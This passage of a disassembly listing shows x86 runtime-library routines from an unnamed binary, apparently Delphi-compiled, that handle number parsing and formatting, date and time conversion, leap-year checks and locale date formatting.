cmp byte ptr [ebx+edi+3], 39h
ja short loc_40008BC9
jmp short loc_40008BFD
; ---------------------------------------------------------------------------
loc_40008BDE: ; CODE XREF: sub_40008B01+CE�j
mov word ptr [ebx+3], 31h
inc dword ptr [ebp-8]
jmp short loc_40008BFD
; ---------------------------------------------------------------------------
loc_40008BE9: ; CODE XREF: sub_40008B01+BF�j
mov edi, 12h
loc_40008BEE: ; CODE XREF: sub_40008B01+C6�j
; sub_40008B01+FA�j
mov byte ptr [ebx+edi+3], 0
dec edi
js short loc_40008C0F
cmp byte ptr [ebx+edi+3], 30h
jz short loc_40008BEE
loc_40008BFD: ; CODE XREF: sub_40008B01+DB�j
; sub_40008B01+E6�j
mov dx, [esi+8]
loc_40008C01: ; CODE XREF: sub_40008B01+110�j
mov eax, [ebp-8]
loc_40008C04: ; CODE XREF: sub_40008B01+31�j
shr dx, 0Fh
mov [ebx], ax
mov [ebx+2], dl
retn
; ---------------------------------------------------------------------------
loc_40008C0F: ; CODE XREF: sub_40008B01+F3�j
; DATA XREF: sub_40008C23+60�r
xor edx, edx
jmp short loc_40008C01
sub_40008B01 endp
; ---------------------------------------------------------------------------
db 0Ah
dd 64000000h, 0E8000000h, 10000003h
db 27h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40008C23 proc near ; CODE XREF: sub_40008AD4+19�p
mov eax, [esi]
mov edx, [esi+4]
mov ecx, eax
or ecx, edx
jz loc_40008CE9
or edx, edx
jns short loc_40008C3D
neg edx
neg eax
sbb edx, 0
loc_40008C3D: ; CODE XREF: sub_40008C23+11�j
xor ecx, ecx
mov edi, [ebp+8]
or edi, edi
jge short loc_40008C48
xor edi, edi
loc_40008C48: ; CODE XREF: sub_40008C23+21�j
cmp edi, 4
jl short loc_40008C6C
mov edi, 4
loc_40008C52: ; CODE XREF: sub_40008C23+3B�j
inc ecx
sub eax, 0A7640000h
sbb edx, 0DE0B6B3h
jnb short loc_40008C52
dec ecx
add eax, 0A7640000h
adc edx, 0DE0B6B3h
loc_40008C6C: ; CODE XREF: sub_40008C23+28�j
mov [ebp-20h], eax
mov [ebp-1Ch], edx
fild qword ptr [ebp-20h]
mov edx, edi
mov eax, 4
sub eax, edx
jz short loc_40008C8A
mov edi, [ebp-4]
fidiv dword ptr ds:loc_40008C0F[edi+eax*4]
loc_40008C8A: ; CODE XREF: sub_40008C23+5B�j
fbstp tbyte ptr [ebp-18h]
lea edi, [ebx+3]
wait
or ecx, ecx
jnz short loc_40008CB0
mov ecx, 9
loc_40008C9A: ; CODE XREF: sub_40008C23+89�j
mov al, [ecx+ebp-19h]
mov ah, al
shr al, 4
jnz short loc_40008CC3
mov al, ah
and al, 0Fh
jnz short loc_40008CCA
dec ecx
jnz short loc_40008C9A
jmp short loc_40008CE9
; ---------------------------------------------------------------------------
loc_40008CB0: ; CODE XREF: sub_40008C23+70�j
mov al, cl
add al, 30h
stosb
mov ecx, 9
loc_40008CBA: ; CODE XREF: sub_40008C23+AB�j
mov al, [ecx+ebp-19h]
mov ah, al
shr al, 4
loc_40008CC3: ; CODE XREF: sub_40008C23+80�j
add al, 30h
stosb
mov al, ah
and al, 0Fh
loc_40008CCA: ; CODE XREF: sub_40008C23+86�j
add al, 30h
stosb
dec ecx
jnz short loc_40008CBA
mov eax, edi
lea ecx, [ebx+edx+3]
sub eax, ecx
loc_40008CD8: ; CODE XREF: sub_40008C23+BC�j
mov byte ptr [edi], 0
dec edi
cmp byte ptr [edi], 30h
jz short loc_40008CD8
mov edx, [esi+4]
shr edx, 1Fh
jmp short loc_40008CF0
; ---------------------------------------------------------------------------
loc_40008CE9: ; CODE XREF: sub_40008C23+9�j
; sub_40008C23+8B�j
xor eax, eax
xor edx, edx
mov [ebx+3], al
loc_40008CF0: ; CODE XREF: sub_40008C23+C4�j
mov [ebx], ax
mov [ebx+2], dl
retn
sub_40008C23 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40008AD4
loc_40008CF7: ; CODE XREF: sub_40008AD4+1E�j
; sub_40008AD4+28�j
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_40008AD4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008D00 proc near ; CODE XREF: sub_40008E74+11�p
; sub_40008E90+14�p ...
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
; FUNCTION CHUNK AT 40008E0D SIZE 00000007 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov esi, eax
mov edi, edx
mov [ebp+var_4], 0
mov al, ds:byte_4001E80F
mov [ebp+var_5], al
mov ebx, ecx
fstcw [ebp+var_8]
fclex
fldcw word_4001A874
fldz
call sub_40008DB7
mov bh, [esi]
cmp bh, 2Bh
jz short loc_40008D3E
cmp bh, 2Dh
jnz short loc_40008D3F
loc_40008D3E: ; CODE XREF: sub_40008D00+37�j
inc esi
loc_40008D3F: ; CODE XREF: sub_40008D00+3C�j
mov ecx, esi
call sub_40008DC2
xor edx, edx
mov al, [esi]
cmp al, [ebp+var_5]
jnz short loc_40008D57
inc esi
call sub_40008DC2
neg edx
loc_40008D57: ; CODE XREF: sub_40008D00+4D�j
cmp ecx, esi
jz short loc_40008DAA
mov al, [esi]
and al, 0DFh
cmp al, 45h
jnz short loc_40008D6D
inc esi
push edx
call sub_40008DDE
pop eax
add edx, eax
loc_40008D6D: ; CODE XREF: sub_40008D00+61�j
call sub_40008DB7
cmp byte ptr [esi], 0
jnz short loc_40008DAA
mov eax, edx
cmp bl, 1
jnz short loc_40008D81
add eax, 4
loc_40008D81: ; CODE XREF: sub_40008D00+7C�j
push ebx
mov ebx, [ebp+var_4]
call sub_40003870
pop ebx
cmp bh, 2Dh
jnz short loc_40008D92
fchs
loc_40008D92: ; CODE XREF: sub_40008D00+8E�j
cmp bl, 0
jz short loc_40008D9B
fistp qword ptr [edi]
jmp short loc_40008D9D
; ---------------------------------------------------------------------------
loc_40008D9B: ; CODE XREF: sub_40008D00+95�j
fstp tbyte ptr [edi]
loc_40008D9D: ; CODE XREF: sub_40008D00+99�j
fstsw ax
test ax, 9
jnz short loc_40008DAC
mov al, 1
jmp short loc_40008DAE
; ---------------------------------------------------------------------------
loc_40008DAA: ; CODE XREF: sub_40008D00+59�j
; sub_40008D00+75�j
fstp st
loc_40008DAC: ; CODE XREF: sub_40008D00+A4�j
xor eax, eax
loc_40008DAE: ; CODE XREF: sub_40008D00+A8�j
fclex
fldcw [ebp+var_8]
wait
jmp short loc_40008E0D
sub_40008D00 endp
; =============== S U B R O U T I N E =======================================
sub_40008DB7 proc near ; CODE XREF: sub_40008D00+2D�p
; sub_40008D00:loc_40008D6D�p ...
lodsb
or al, al
jz short loc_40008DC0
cmp al, 20h
jz short sub_40008DB7
loc_40008DC0: ; CODE XREF: sub_40008DB7+3�j
dec esi
retn
sub_40008DB7 endp
; =============== S U B R O U T I N E =======================================
sub_40008DC2 proc near ; CODE XREF: sub_40008D00+41�p
; sub_40008D00+50�p
xor eax, eax
xor edx, edx
loc_40008DC6: ; CODE XREF: sub_40008DC2+18�j
lodsb
sub al, 3Ah
add al, 0Ah
jnb short loc_40008DDC
fimul flt_4001A870
mov [ebp-0Ch], eax
fiadd dword ptr [ebp-0Ch]
inc edx
jmp short loc_40008DC6
; ---------------------------------------------------------------------------
loc_40008DDC: ; CODE XREF: sub_40008DC2+9�j
dec esi
retn
sub_40008DC2 endp
; =============== S U B R O U T I N E =======================================
sub_40008DDE proc near ; CODE XREF: sub_40008D00+65�p
xor eax, eax
xor edx, edx
mov cl, [esi]
cmp cl, 2Bh
jz short loc_40008DEE
cmp cl, 2Dh
jnz short loc_40008DEF
loc_40008DEE: ; CODE XREF: sub_40008DDE+9�j
inc esi
loc_40008DEF: ; CODE XREF: sub_40008DDE+E�j
; sub_40008DDE+25�j
mov al, [esi]
sub al, 3Ah
add al, 0Ah
jnb short loc_40008E05
inc esi
imul edx, 0Ah
add edx, eax
cmp edx, 1F4h
jb short loc_40008DEF
loc_40008E05: ; CODE XREF: sub_40008DDE+17�j
cmp cl, 2Dh
jnz short locret_40008E0C
neg edx
locret_40008E0C: ; CODE XREF: sub_40008DDE+2A�j
retn
sub_40008DDE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40008D00
loc_40008E0D: ; CODE XREF: sub_40008D00+B5�j
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_40008D00
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008E14 proc near ; CODE XREF: sub_400116DC+104�p
; sub_400116DC+125�p ...
var_40 = byte ptr -40h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFC0h
push ebx
mov ebx, eax
push 0
push 0Fh
push 0
lea edx, [ebp+arg_0]
lea eax, [ebp+var_40]
xor ecx, ecx
call sub_40008800
mov ecx, eax
lea edx, [ebp+var_40]
mov eax, ebx
call sub_40004974
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_40008E14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008E44 proc near ; CODE XREF: sub_4000D0E8+38�p
var_40 = byte ptr -40h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFC0h
push ebx
mov ebx, eax
push 0
push 0
push 0
lea edx, [ebp+arg_0]
lea eax, [ebp+var_40]
mov cl, 1
call sub_40008800
mov ecx, eax
lea edx, [ebp+var_40]
mov eax, ebx
call sub_40004974
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40008E44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008E74 proc near ; CODE XREF: sub_40007F40+12�p
; sub_400101AC+66�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_40004D48
mov edx, esi
xor ecx, ecx
call sub_40008D00
pop esi
pop ebx
retn
sub_40008E74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40008E90 proc near ; CODE XREF: sub_4000CF24+35�p
; sub_40010874+83�p
var_14 = tbyte ptr -14h
push ebx
push esi
add esp, 0FFFFFFF4h
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_40004D48
mov edx, esp
xor ecx, ecx
call sub_40008D00
test al, al
jz short loc_40008EB3
fld [esp+14h+var_14]
fstp qword ptr [esi]
wait
loc_40008EB3: ; CODE XREF: sub_40008E90+1B�j
add esp, 0Ch
pop esi
pop ebx
retn
sub_40008E90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008EBC proc near ; CODE XREF: sub_4000CEB8+35�p
var_14 = tbyte ptr -14h
push ebx
push esi
add esp, 0FFFFFFF4h
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_40004D48
mov edx, esp
xor ecx, ecx
call sub_40008D00
test al, al
jz short loc_40008EDF
fld [esp+14h+var_14]
fstp dword ptr [esi]
wait
loc_40008EDF: ; CODE XREF: sub_40008EBC+1B�j
add esp, 0Ch
pop esi
pop ebx
retn
sub_40008EBC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40008EE8 proc near ; CODE XREF: sub_4000CFFC+35�p
; sub_40010E0C+66�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_40004D48
mov edx, esi
mov cl, 1
call sub_40008D00
pop esi
pop ebx
retn
sub_40008EE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40008F04(double)
sub_40008F04 proc near ; CODE XREF: sub_40008FB8+1C�p
; sub_4000911C+1D�p ...
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
mov ecx, eax
fld [ebp+arg_0]
fmul flt_4001A878[ebx]
sub esp, 8
fistp [esp+0Ch+var_C]
wait
pop eax
pop edx
or edx, edx
jns short loc_40008F33
neg edx
neg eax
sbb edx, 0
div dword_4001A87C[ebx]
neg eax
jmp short loc_40008F39
; ---------------------------------------------------------------------------
loc_40008F33: ; CODE XREF: sub_40008F04+1C�j
div dword_4001A87C[ebx]
loc_40008F39: ; CODE XREF: sub_40008F04+2D�j
add eax, 0A955Ah
mov [ecx], edx
mov [ecx+4], eax
pop ebx
pop ebp
retn 8
sub_40008F04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008F48 proc near ; CODE XREF: sub_4000A518+1CE�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_1], 0
cmp ax, 18h
jnb short loc_40008FA9
cmp dx, 3Ch
jnb short loc_40008FA9
cmp cx, 3Ch
jnb short loc_40008FA9
cmp si, 3E8h
jnb short loc_40008FA9
movzx eax, ax
imul eax, 36EE80h
movzx edx, dx
imul edx, 0EA60h
add eax, edx
movzx edx, cx
imul edx, 3E8h
add eax, edx
movzx edx, si
add eax, edx
mov [ebp+var_8], eax
fild [ebp+var_8]
fdiv ds:flt_40008FB4
mov eax, [ebp+arg_0]
fstp qword ptr [eax]
wait
mov [ebp+var_1], 1
loc_40008FA9: ; CODE XREF: sub_40008F48+12�j
; sub_40008F48+18�j ...
movzx eax, [ebp+var_1]
pop esi
pop ecx
pop ecx
pop ebp
retn 8
sub_40008F48 endp
; ---------------------------------------------------------------------------
flt_40008FB4 dd 8.64e7 ; DATA XREF: sub_40008F48+51�r
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40008FB8(int, double)
sub_40008FB8 proc near ; CODE XREF: sub_400093D4+31�p
var_C = dword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push dword ptr [ebp+arg_4+4]
push dword ptr [ebp+arg_4] ; double
lea eax, [ebp+var_C]
call sub_40008F04
mov eax, [ebp+var_C]
lea ecx, [ebp+var_2]
mov dx, 0EA60h
call sub_4000797C
push esi
mov ecx, ebx
movzx eax, [ebp+var_2]
mov dx, 3Ch
call sub_4000797C
mov eax, [ebp+arg_0]
push eax
mov ecx, edi
movzx eax, [ebp+var_4]
mov dx, 3E8h
call sub_4000797C
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_40008FB8 endp
; =============== S U B R O U T I N E =======================================
sub_40009014 proc near ; CODE XREF: sub_40009050+19�p
; sub_4000911C+EF�p
push ebx
push esi
mov ecx, eax
movzx eax, cx
and eax, 3
test eax, eax
jnz short loc_40009043
movzx ebx, cx
mov eax, ebx
mov esi, 64h
xor edx, edx
div esi
test edx, edx
jnz short loc_40009048
mov eax, ebx
mov ecx, 190h
xor edx, edx
div ecx
test edx, edx
jz short loc_40009048
loc_40009043: ; CODE XREF: sub_40009014+C�j
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40009048: ; CODE XREF: sub_40009014+1E�j
; sub_40009014+2D�j
mov al, 1
pop esi
pop ebx
retn
sub_40009014 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009050 proc near ; CODE XREF: sub_4000A1CC+2F7�p
var_8 = dword ptr -8
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, ecx
mov edi, edx
mov [ebp+var_2], ax
mov [ebp+var_3], 0
movzx eax, [ebp+var_2]
call sub_40009014
and eax, 7Fh
lea eax, [eax+eax*2]
lea esi, dword_4001A7FC[eax*8]
cmp [ebp+var_2], 1
jb loc_4000910C
cmp [ebp+var_2], 270Fh
ja short loc_4000910C
cmp di, 1
jb short loc_4000910C
cmp di, 0Ch
ja short loc_4000910C
cmp bx, 1
jb short loc_4000910C
movzx eax, di
cmp bx, [esi+eax*2-2]
ja short loc_4000910C
movzx eax, di
dec eax
test eax, eax
jle short loc_400090C0
mov ecx, 1
loc_400090B7: ; CODE XREF: sub_40009050+6E�j
add bx, [esi+ecx*2-2]
inc ecx
dec eax
jnz short loc_400090B7
loc_400090C0: ; CODE XREF: sub_40009050+60�j
movzx ecx, [ebp+var_2]
dec ecx
mov eax, ecx
mov esi, 64h
cdq
idiv esi
imul esi, ecx, 16Dh
mov edx, ecx
test edx, edx
jns short loc_400090DE
add edx, 3
loc_400090DE: ; CODE XREF: sub_40009050+89�j
sar edx, 2
add esi, edx
sub esi, eax
mov eax, ecx
mov ecx, 190h
cdq
idiv ecx
add esi, eax
movzx eax, bx
add esi, eax
sub esi, 0A955Ah
mov [ebp+var_8], esi
fild [ebp+var_8]
mov eax, [ebp+arg_0]
fstp qword ptr [eax]
wait
mov [ebp+var_3], 1
loc_4000910C: ; CODE XREF: sub_40009050+30�j
; sub_40009050+3C�j ...
movzx eax, [ebp+var_3]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 4
sub_40009050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4000911C(int, double)
sub_4000911C proc near ; CODE XREF: sub_40009268+13�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
push esi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov ebx, [ebp+arg_0]
push dword ptr [ebp+arg_4+4]
push dword ptr [ebp+arg_4] ; double
lea eax, [ebp+var_18]
call sub_40008F04
mov ecx, [ebp+var_14]
test ecx, ecx
jg short loc_40009169
mov eax, [ebp+var_4]
mov word ptr [eax], 0
mov eax, [ebp+var_8]
mov word ptr [eax], 0
mov eax, [ebp+var_C]
mov word ptr [eax], 0
mov word ptr [ebx], 0
xor edx, edx
jmp loc_4000925B
; ---------------------------------------------------------------------------
loc_40009169: ; CODE XREF: sub_4000911C+27�j
mov eax, ecx
mov esi, 7
cdq
idiv esi
inc edx
mov [ebx], dx
dec ecx
mov bx, 1
cmp ecx, 23AB1h
jl short loc_40009197
loc_40009184: ; CODE XREF: sub_4000911C+79�j
sub ecx, 23AB1h
add bx, 190h
cmp ecx, 23AB1h
jge short loc_40009184
loc_40009197: ; CODE XREF: sub_4000911C+66�j
lea eax, [ebp+var_E]
push eax
lea eax, [ebp+var_10]
mov dx, 8EACh
xchg eax, ecx
call sub_4000797C
cmp [ebp+var_10], 4
jnz short loc_400091B9
dec [ebp+var_10]
add [ebp+var_E], 8EACh
loc_400091B9: ; CODE XREF: sub_4000911C+91�j
imul ax, [ebp+var_10], 64h
add bx, ax
lea eax, [ebp+var_E]
push eax
lea ecx, [ebp+var_10]
movzx eax, [ebp+var_E]
mov dx, 5B5h
call sub_4000797C
movzx eax, [ebp+var_10]
add eax, eax
add eax, eax
add bx, ax
lea eax, [ebp+var_E]
push eax
lea ecx, [ebp+var_10]
movzx eax, [ebp+var_E]
mov dx, 16Dh
call sub_4000797C
cmp [ebp+var_10], 4
jnz short loc_40009205
dec [ebp+var_10]
add [ebp+var_E], 16Dh
loc_40009205: ; CODE XREF: sub_4000911C+DD�j
add bx, [ebp+var_10]
mov eax, ebx
call sub_40009014
mov edx, eax
movzx eax, dl
lea eax, [eax+eax*2]
lea esi, dword_4001A7FC[eax*8]
mov ax, 1
loc_40009223: ; CODE XREF: sub_4000911C+126�j
movzx ecx, ax
movzx ecx, word ptr [esi+ecx*2-2]
mov [ebp+var_10], cx
movzx ecx, [ebp+var_E]
cmp cx, [ebp+var_10]
jb short loc_40009244
movzx ecx, [ebp+var_10]
sub [ebp+var_E], cx
inc eax
jmp short loc_40009223
; ---------------------------------------------------------------------------
loc_40009244: ; CODE XREF: sub_4000911C+11B�j
mov ecx, [ebp+var_4]
mov [ecx], bx
mov ecx, [ebp+var_8]
mov [ecx], ax
movzx eax, [ebp+var_E]
inc eax
mov ecx, [ebp+var_C]
mov [ecx], ax
loc_4000925B: ; CODE XREF: sub_4000911C+48�j
mov eax, edx
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_4000911C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40009268(double)
sub_40009268 proc near ; CODE XREF: sub_4000939C+2A�p
var_2 = dword ptr -2
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
push dword ptr [ebp+arg_0+4]
push dword ptr [ebp+arg_0] ; double
lea eax, [ebp+var_2]
push eax ; int
mov eax, esi
call sub_4000911C
pop esi
pop ecx
pop ebp
retn 8
sub_40009268 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40009288(double)
sub_40009288 proc near ; CODE XREF: sub_400096A8+2B3�p
; sub_400096A8+2DA�p ...
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push dword ptr [ebp+arg_0+4]
push dword ptr [ebp+arg_0] ; double
lea eax, [ebp+var_8]
call sub_40008F04
mov eax, [ebp+var_4]
mov ecx, 7
cdq
idiv ecx
mov eax, edx
inc eax
pop ecx
pop ecx
pop ebp
retn 8
sub_40009288 endp
; =============== S U B R O U T I N E =======================================
sub_400092B0 proc near ; CODE XREF: sub_4000A170+14�p
; sub_4000A1CC+1A5�p ...
var_10 = word ptr -10h
add esp, 0FFFFFFF0h
push esp
call sub_40006588 ; GetLocalTime
movzx eax, [esp+10h+var_10]
add esp, 10h
retn
sub_400092B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400092C4 proc near ; CODE XREF: sub_40009308+12�p
; sub_40009324+3D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ecx, [ebp+arg_0]
mov ebx, 100h
sub ebx, [ecx-104h]
cmp edx, ebx
jge short loc_400092DC
mov ebx, edx
loc_400092DC: ; CODE XREF: sub_400092C4+14�j
test ebx, ebx
jz short loc_400092FA
mov edx, [ebp+arg_0]
mov edx, [edx-104h]
mov ecx, [ebp+arg_0]
lea edx, [ecx+edx-100h]
mov ecx, ebx
call sub_40002DFC
loc_400092FA: ; CODE XREF: sub_400092C4+1A�j
mov eax, [ebp+arg_0]
add [eax-104h], ebx
pop ebx
pop ebp
retn
sub_400092C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009308 proc near ; CODE XREF: sub_400096A8+1D2�p
; sub_400096A8+1FF�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov edx, eax
test edx, edx
jz short loc_40009316
sub edx, 4
mov edx, [edx]
loc_40009316: ; CODE XREF: sub_40009308+7�j
mov ecx, [ebp+arg_0]
push ecx
call sub_400092C4
pop ecx
pop ebp
retn
sub_40009308 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009324 proc near ; CODE XREF: sub_400096A8+18D�p
; sub_400096A8+1A5�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, [ebp+arg_0]
push eax
push 4
mov [ebp+var_20], esi
mov [ebp+var_1C], 0
mov [ebp+var_18], ebx
mov [ebp+var_14], 0
lea eax, [ebp+var_20]
push eax
push 1
mov ecx, offset dword_4001A880
lea eax, [ebp+var_10]
mov edx, 10h
call sub_40008314
mov edx, eax
lea eax, [ebp+var_10]
call sub_400092C4
pop ecx
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40009324 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009370 proc near ; CODE XREF: sub_400096A8+162�p
; sub_400096A8+1B1�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFCh
mov edx, [eax]
jmp short loc_40009380
; ---------------------------------------------------------------------------
loc_4000937E: ; CODE XREF: sub_40009370+1B�j
inc dword ptr [eax]
loc_40009380: ; CODE XREF: sub_40009370+C�j
mov ecx, [eax]
movzx ecx, byte ptr [ecx]
mov ebx, [ebp+arg_0]
cmp cl, [ebx-5]
jz short loc_4000937E
mov eax, [eax]
sub eax, edx
inc eax
mov edx, [ebp+arg_0]
mov [edx-0Ch], eax
pop ebx
pop ebp
retn
sub_40009370 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000939C proc near ; CODE XREF: sub_400096A8+169�p
; sub_400096A8+1B8�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp byte ptr [eax-13h], 0
jnz short loc_400093D2
mov eax, [ebp+arg_0]
mov eax, [eax+8]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
mov eax, [ebp+arg_0]
lea ecx, [eax-12h]
mov eax, [ebp+arg_0]
lea edx, [eax-10h]
mov eax, [ebp+arg_0]
add eax, 0FFFFFFF2h
call sub_40009268
mov eax, [ebp+arg_0]
mov byte ptr [eax-13h], 1
loc_400093D2: ; CODE XREF: sub_4000939C+A�j
pop ebp
retn
sub_4000939C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400093D4 proc near ; CODE XREF: sub_400096A8+324�p
; sub_400096A8+428�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp byte ptr [eax-1Dh], 0
jnz short loc_40009411
mov eax, [ebp+arg_0]
mov eax, [eax+8]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
mov eax, [ebp+arg_0]
add eax, 0FFFFFFE4h
push eax ; int
mov eax, [ebp+arg_0]
lea ecx, [eax-1Ah]
mov eax, [ebp+arg_0]
lea edx, [eax-18h]
mov eax, [ebp+arg_0]
add eax, 0FFFFFFEAh
call sub_40008FB8
mov eax, [ebp+arg_0]
mov byte ptr [eax-1Dh], 1
loc_40009411: ; CODE XREF: sub_400093D4+A�j
pop ebp
retn
sub_400093D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009414 proc near ; CODE XREF: sub_400096A8+1C9�p
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_E = word ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEE4h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_11C], ecx
mov [ebp+var_4], ecx
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40009576
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, ebx
call sub_40004884
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-0Eh]
mov [ebp+var_14], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-10h]
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-12h]
mov [ebp+var_E], ax
lea eax, [ebp+var_4]
mov edx, offset dword_4000958C
call sub_4000491C
push 100h
lea eax, [ebp+var_114]
push eax
mov eax, [ebp+var_4]
call sub_40004D48
push eax
lea eax, [ebp+var_14]
push eax
push 4
call sub_400065C8 ; GetThreadLocale
push eax
call sub_40006568 ; GetDateFormatA
test eax, eax
jz loc_40009555
mov eax, ebx
lea edx, [ebp+var_114]
mov ecx, 100h
call sub_40004AF4
dec esi
jnz loc_40009555
mov eax, ds:dword_4001E8CC
sub eax, 4
jz short loc_400094E8
sub eax, 0Dh
jnz loc_40009555
push ebx
mov eax, [ebx]
mov edx, 1
call sub_4000BAF0
mov ecx, eax
mov eax, [ebx]
mov edx, 1
call sub_40004DA8
jmp short loc_40009555
; ---------------------------------------------------------------------------
loc_400094E8: ; CODE XREF: sub_40009414+AC�j
cmp ds:dword_4001E8D0, 1
jnz short loc_40009555
mov eax, [ebx]
mov [ebp+var_118], eax
mov esi, [ebp+var_118]
test esi, esi
jz short loc_40009508
sub esi, 4
mov esi, [esi]
loc_40009508: ; CODE XREF: sub_40009414+ED�j
mov eax, [ebx]
mov edx, esi
call sub_4000B950
cmp eax, 4
jnz short loc_40009555
mov eax, [ebx]
mov edx, 3
call sub_4000BA6C
mov esi, eax
lea eax, [ebp+var_114]
add esi, eax
dec esi
lea eax, [ebp+var_11C]
mov edx, esi
call sub_40004A7C
mov eax, [ebp+var_11C]
mov edx, 2
call sub_4000BAF0
mov ecx, eax
mov eax, ebx
mov edx, esi
call sub_40004974
loc_40009555: ; CODE XREF: sub_40009414+85�j
